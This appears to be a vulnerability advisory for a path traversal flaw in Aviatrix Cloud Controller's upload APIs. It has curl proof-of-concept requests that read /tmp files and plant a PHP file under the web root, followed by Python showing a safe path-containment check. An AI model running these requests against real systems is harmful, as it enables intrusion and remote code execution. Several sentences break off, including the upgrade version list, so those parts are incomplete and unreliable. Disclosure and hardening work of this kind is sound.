Aviatrix Cloud Controller includes multiple APIs that by design upload files from authenticated users. Some of these APIs do not adequately sanitise their input, allowing an attacker to construct a pathname that is outside the intended upload directory. The directories that can be written to include those under the web root, which allows an attacker to upload and then run code of their choosing.
Exploitation requires a CID token. This is sent in the response to the login_proc action, and is used in most API calls.
$ curl -k https://aviatrix/v1/backend1 -d action=login_proc -d "username=Test User" -d "password=Password"
Using that CID, make the following request, which reads a file from /tmp. On recent versions (after January 2021), replace the path with
$ curl -k https://aviatrix/v1/backend1 -d CID=ZyGaXCfPI20XD4x5MIY9 -d action=get_metric_gw_selections -d account_name=/../../../../../tmp/build_info
Files can also be written under the web root, in /var/www/php/downloads. This directory is not protected by a
$ curl -k https://aviatrix/v1/backend1 -d CID=ZyGaXCfPI20XD4x5MIY9 -d action=set_metric_gw_selections -d account_name=/../../downloads/test.php -d data="hello<?php phpinfo()?>"
Requesting https://aviatrix/v1/downloads/test.php will then show the PHP version information.
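The root cause described above is that a user-supplied value (here the account_name parameter) is joined onto a directory path without confining the result. The following Python is an added illustration written for this advisory, not Aviatrix code: it contrasts the naive concatenation with a hardened resolver that normalises the candidate path and refuses anything that does not land strictly inside the intended upload directory. The directory name /srv/uploads and the dict used as a stand-in filesystem are constructed for the example; the rejected inputs are the two traversal values quoted in the requests above.

```python
import posixpath

# Constructed for this example: the directory uploads are meant to land in.
UPLOAD_ROOT = "/srv/uploads"


def unsafe_path(base: str, name: str) -> str:
    """Vulnerable pattern: naive concatenation.

    '..' segments in the user-controlled name walk out of base, so a value such
    as /../../../../../tmp/build_info resolves to /tmp/build_info.
    """
    return posixpath.normpath(base + "/" + name)


def safe_path(base: str, name: str) -> str:
    """Hardened pattern: resolve first, then check containment.

    The user value is always treated as a name relative to base (leading
    slashes are stripped so an absolute path cannot override base), the joined
    path is lexically normalised, and the result must start with base + '/'.
    Equality with base itself is rejected too, so '', '.' and '..' all fail.
    Raises ValueError on any escape attempt.
    """
    if "\x00" in name:
        raise ValueError("NUL byte in filename")
    base_abs = posixpath.normpath(base)
    candidate = posixpath.normpath(posixpath.join(base_abs, name.lstrip("/")))
    if not candidate.startswith(base_abs + "/"):
        raise ValueError(f"path escapes upload directory: {name!r}")
    # On a real filesystem, also pass `candidate` through os.path.realpath and
    # repeat the prefix check, so symlinks under base cannot point elsewhere.
    return candidate


def store_upload(name: str, data: bytes, storage: dict, base: str = UPLOAD_ROOT) -> str:
    """Hardened write handler. `storage` is a dict standing in for the
    filesystem (constructed for this example); returns the confined path."""
    path = safe_path(base, name)
    storage[path] = data
    return path


if __name__ == "__main__":
    for value in ("/../../../../../tmp/build_info", "/../../downloads/test.php", "report.csv"):
        print("naive  :", unsafe_path(UPLOAD_ROOT, value))
        try:
            print("checked:", safe_path(UPLOAD_ROOT, value))
        except ValueError as exc:
            print("checked: rejected,", exc)
```

The containment test is deliberately a prefix match against base plus a trailing slash rather than a plain startswith(base): without the slash, /srv/uploads-old/x would be accepted as being "under" /srv/uploads.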
Upgrade to one of the following versions: